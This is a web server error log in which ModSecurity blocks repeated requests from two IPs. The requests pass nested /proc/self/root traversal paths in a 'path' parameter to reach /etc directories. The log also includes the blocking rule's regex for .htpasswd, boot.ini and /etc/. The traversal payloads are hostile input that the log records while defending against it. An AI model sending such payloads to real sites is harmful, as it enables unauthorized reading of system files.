[Thu Mar 19 04:43:53.767483 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.243.128:47186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupOf-YZRR_7pZ7nDJb2AAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:55.019297 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:51784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupO9a6ubjKNq_cu4YP_wAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:55.076498 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:47196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupO_u8EFLIOrSqIptsAwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:43:57.457770 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:47210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupPcdf6f5d65gmYZRBwwAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:58.608998 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.241.31:51798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupPhkFeYa1D6dYQnC8oAAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:43:59.922998 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:38732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupP-oXxyEfFpUF8f_fCAAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:03.522800 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:38744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupQ-oXxyEfFpUF8f_fDgAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:06.844479 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:38748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupReyqAr6etmhZHNoyNwAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:09.326121 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:49808] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupSda6ubjKNq_cu4YQEQAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:10.727333 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.241.31:49810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupSvu8EFLIOrSqIptsFgAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:44:12.853378 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:49814] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupTAkwaGbbGflqUZCDYQAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:14.408919 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:49818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupTgbLMZ6AikZjR9UsFwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:17.088693 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:49830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupT-yqAr6etmhZHNoyOgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:21.439194 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:47214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupVRkFeYa1D6dYQnC8tgAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:21.915417 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:50304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupVcdf6f5d65gmYZRB1gAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:23.926805 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:50320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupV9a6ubjKNq_cu4YQGQAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:44:25.081475 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:56224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupWRkFeYa1D6dYQnC8uAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:25.382982 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:50332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupWda6ubjKNq_cu4YQIAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:44:27.796932 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.243.128:56232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupWgbLMZ6AikZjR9UsHgAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:30.328511 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:50346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupXta6ubjKNq_cu4YQLwAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:44:30.383833 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.243.128:56246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abupXgbLMZ6AikZjR9UsJwAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:44:31.619777 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:35858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 